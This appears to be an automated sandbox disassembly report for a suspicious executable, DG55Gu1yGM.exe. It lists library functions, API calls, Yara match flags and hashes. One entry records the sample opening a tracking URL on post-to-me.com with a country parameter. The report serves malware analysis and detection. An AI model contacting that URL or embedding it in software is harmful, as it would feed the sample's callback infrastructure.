                                                                                                                                                                                                                                          • Part of subcall function 0214121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0214125A
                                                                                                                                                                                                                                          • Part of subcall function 0214121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021412D0
                                                                                                                                                                                                                                          • Part of subcall function 0214121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021412D8
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02137BBF
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02137BC9
                                                                                                                                                                                                                                        • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02137BD3
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02137BF1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4266703842-0
                                                                                                                                                                                                                                        • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                        • Instruction ID: f63152ff325f47e5f73778924c54507dc54aec0e3b671b2fbe79e0ec139767f4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4DF0F6716802186FCE27B775981096DF7379F80B14B10416AD80493290EF359E068FD2
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                                                                                                                                                                                                        • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                                                                                                                                                                                                          • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                                                                                                                                                                                                          • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                                                                                                                                                                                                          • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                                                                                                                                                                                                          • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                                                                                                                                                                                        • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4266703842-0
                                                                                                                                                                                                                                        • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                        • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A0C4
                                                                                                                                                                                                                                          • Part of subcall function 021536D1: HeapFree.KERNEL32(00000000,00000000,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?), ref: 021536E7
                                                                                                                                                                                                                                          • Part of subcall function 021536D1: GetLastError.KERNEL32(?,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?,?), ref: 021536F9
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A0D6
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A0E8
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A0FA
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A10C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                        • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                        • Instruction ID: b49803ec2a16db3007e3265900640c58f144a5de1bcd8167c9f549f7574a9de5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2DF068325C5320EF8660EB54E8C6C0673DAAF043907640ED9F834D7B11CB71F8D08A99
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00439E5D
                                                                                                                                                                                                                                          • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                          • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00439E6F
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00439E81
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00439E93
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00439EA5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                        • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                        • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0213CF36
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0213CF67
                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0213CF70
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0213CF83
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0213CF8C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2583373041-0
                                                                                                                                                                                                                                        • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                        • Instruction ID: 78800e08dbe0351f2a9e933addb3997dec178c3e118be8cc90afbd77a71011b0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AF0A036280900DFCA27FF21FA908BBB7BBAFC4610310465DE59B86550CF21A807DFA1
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2583373041-0
                                                                                                                                                                                                                                        • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                        • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02122E8E
                                                                                                                                                                                                                                          • Part of subcall function 02121321: _wcslen.LIBCMT ref: 02121328
                                                                                                                                                                                                                                          • Part of subcall function 02121321: _wcslen.LIBCMT ref: 02121344
                                                                                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 021230A1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InternetOpen_wcslen
                                                                                                                                                                                                                                        • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                        • API String ID: 3381584094-4083784958
                                                                                                                                                                                                                                        • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                        • Instruction ID: 31af903991bb9adc28afed7a758ada7f6d26f274f266f6f99df73241b9e4e0d7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16515195E55344A9E320EFB0BC45B723378FF58712F10643AE528CB2B2E7A19944C71E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0214896A
                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 02148A23
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                        • String ID: fB$csm
                                                                                                                                                                                                                                        • API String ID: 3480331319-1586063737
                                                                                                                                                                                                                                        • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                        • Instruction ID: 50a3401eae9d71a00c58095fec5b590a339b8b807a30b5f4e4b9c54712f1e65e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3341F630A80249AFCF10DF28CC44AAE7BA1AF45328F258166D9195B391CB72E901CF91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DG55Gu1yGM.exe,00000104), ref: 0214F9BA
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0214FA85
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0214FA8F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\DG55Gu1yGM.exe
                                                                                                                                                                                                                                        • API String ID: 2506810119-1612166485
                                                                                                                                                                                                                                        • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                        • Instruction ID: 6d31d7b4518771c9a3d5a4bc66c727a35edbaaa8e0d4bfe830f9516c2ce4d7e4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58316171A80258EFDB21DF95DC84D9EBBFDEF89710B2040A7E80997711DB709A41CB91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DG55Gu1yGM.exe,00000104), ref: 0042F753
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0042F81E
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0042F828
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\DG55Gu1yGM.exe
                                                                                                                                                                                                                                        • API String ID: 2506810119-1612166485
                                                                                                                                                                                                                                        • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                        • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 02152178
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9
                                                                                                                                                                                                                                          • Part of subcall function 02159491: _free.LIBCMT ref: 021594F7
                                                                                                                                                                                                                                          • Part of subcall function 02159106: GetOEMCP.KERNEL32(00000000), ref: 02159131
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021593EA
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 02159420
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorLast
                                                                                                                                                                                                                                        • String ID: 8JV$8JV
                                                                                                                                                                                                                                        • API String ID: 3291180501-2462513189
                                                                                                                                                                                                                                        • Opcode ID: c947c04c6369be2b0b67581f9f5cbea0d3a159dd71843e43509783f1e1aa6e4f
                                                                                                                                                                                                                                        • Instruction ID: fbf8e1633d6a84a8c4bc7d460918f13878bc41c49e6afb97b26c252c6684c690
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c947c04c6369be2b0b67581f9f5cbea0d3a159dd71843e43509783f1e1aa6e4f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC31D331944224EFDB10DFA9D580BAEB7E1EF44364F1541DAED249B290EB729D41CF81
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                          • Part of subcall function 0043922A: _free.LIBCMT ref: 00439290
                                                                                                                                                                                                                                          • Part of subcall function 00438E9F: GetOEMCP.KERNEL32(00000000), ref: 00438ECA
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00439183
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004391B9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorLast
                                                                                                                                                                                                                                        • String ID: 8JV$8JV
                                                                                                                                                                                                                                        • API String ID: 3291180501-2462513189
                                                                                                                                                                                                                                        • Opcode ID: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
                                                                                                                                                                                                                                        • Instruction ID: 97d82b3a2133808e380870247b9945ea31129e8917de2cc4f3b867beb4678205
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63312731904205AFEF10EF99D444A5EB7F1EF48324F14119FE80467391DB799E40CB48
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?,02153752,?,?,?,?,?,?,?,?,?,004412BD,000000FF), ref: 0215388A
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,02153752,?,?,?,?,?,?,?,?,?,004412BD,000000FF), ref: 02153894
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 021538BF
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                        • String ID: 0>V
                                                                                                                                                                                                                                        • API String ID: 2583163307-417846078
                                                                                                                                                                                                                                        • Opcode ID: ebdca8a1c7adbe074858f504d58375f2f4c191b84cfa181ab901558326dc3e0e
                                                                                                                                                                                                                                        • Instruction ID: 66a040b304a3e00e15df18a2fa2a51a5e4d3e5a64af503680d9fa835c9a2ab0f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebdca8a1c7adbe074858f504d58375f2f4c191b84cfa181ab901558326dc3e0e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D010C32A80234DED63D2234A844B6D675A5F91B79F2503FDEC398B1C1DB6CD4814191
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,0040DDAB,?,004334EB,0040DDAB,00457AF8,0000000C), ref: 00433623
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,004334EB,0040DDAB,00457AF8,0000000C), ref: 0043362D
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00433658
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                        • String ID: 0>V
                                                                                                                                                                                                                                        • API String ID: 2583163307-417846078
                                                                                                                                                                                                                                        • Opcode ID: c02ba4ad0ae393da633c157a1d22a9d38b5276be70e67d92e6e7ccd80e321485
                                                                                                                                                                                                                                        • Instruction ID: ffcc1f2f27edde42b46ba62bf7cfabe2240423d0af948ad6885287928014fc29
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c02ba4ad0ae393da633c157a1d22a9d38b5276be70e67d92e6e7ccd80e321485
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17016F326042103AD6342B75684677F67458F8EB39F25212FF515873D2DA6DCE82414D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0212C8DE
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throw
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                        • API String ID: 2005118841-1866435925
                                                                                                                                                                                                                                        • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                        • Instruction ID: ec885985737df2aceab03a2d67024d0b536f93f278a6d2b5d0e2c38935588322
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DF0F6728802286ACB04E564CC41BEE33989B05315F06C07BFF56AA082EB68991DCBE4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                        • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                        • String ID: F(@
                                                                                                                                                                                                                                        • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                        • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                        • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                        • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
